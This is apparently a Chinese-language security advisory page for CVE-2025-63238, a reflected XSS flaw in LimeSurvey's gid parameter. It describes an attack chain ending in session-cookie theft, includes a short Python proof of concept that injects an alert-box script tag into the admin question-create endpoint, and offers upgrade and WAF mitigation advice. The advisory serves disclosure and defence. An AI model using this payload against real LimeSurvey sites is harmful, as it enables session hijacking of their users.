CVE-2025-63238 CVSS 6.1 中危

CVE-2025-63238 LimeSurvey反射型XSS漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-63238

漏洞类型

XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

LimeSurvey

漏洞概述

LimeSurvey 6.15.11+250909之前版本存在反射型XSS漏洞。由于`QuestionCreate.php`中`getInstance()`函数未对`gid`参数进行严格验证，攻击者可利用此缺陷构造恶意URL。一旦已登录用户访问，攻击者即可在目标浏览器中执行恶意脚本，窃取Cookie或进行会话劫持，造成敏感信息泄露。

技术细节

该漏洞位于LimeSurvey的`application/models/QuestionCreate.php`文件中的`getInstance()`函数。核心问题在于该函数直接从请求中获取`gid`参数，并将其直接用于页面渲染或逻辑处理，完全绕过了输入验证和输出编码机制。攻击者可以精心构造一个包含恶意JavaScript代码的URL，将Payload嵌入`gid`参数中。当受害者（特别是已登录用户）点击此恶意链接时，服务器会将该参数值未经修改地反射回响应页面。受害者的浏览器解析响应后，会执行其中的恶意脚本。由于脚本运行在LimeSurvey的源站上下文中，攻击者可以读取Cookie、窃取会话令牌，甚至冒充用户执行敏感操作。

攻击链分析

STEP 1

侦察与准备

攻击者发现目标站点使用LimeSurvey，且版本低于6.15.11+250909。

STEP 2

构造恶意链接

攻击者利用`gid`参数的缺陷，构造包含JavaScript恶意载荷的URL。

STEP 3

社会工程学诱导

攻击者通过钓鱼邮件或即时通讯工具，诱导已登录的管理员或用户点击该恶意链接。

STEP 4

执行攻击

受害者访问链接后，服务器反射未过滤的参数，浏览器解析并执行恶意脚本。

STEP 5

会话劫持

恶意脚本窃取用户的Session Cookie或其他敏感信息，发送给攻击者控制的服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2025-63238
# Affected Endpoint: /index.php?r=admin/question/sa/create
# Vulnerable Parameter: gid

import requests

target_url = "http://target-limesurvey.com/index.php"
# Malicious payload to demonstrate XSS (e.g., alert box)
payload = "<script>alert('CVE-2025-63238');</script>"

params = {
    "r": "admin/question/sa/create",
    "gid": payload
}

# Send request
response = requests.get(target_url, params=params)

# Check if payload is reflected in response
if payload in response.text:
    print("Vulnerability confirmed: XSS payload found in response.")
else:
    print("Vulnerability not detected or patched.")

影响范围

LimeSurvey < 6.15.11+250909

防御指南

临时缓解措施

建议立即升级LimeSurvey至修复版本。若暂时无法升级，应部署Web应用防火墙（WAF）规则以拦截包含脚本标签的`gid`参数请求，并限制后台管理访问的来源IP。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表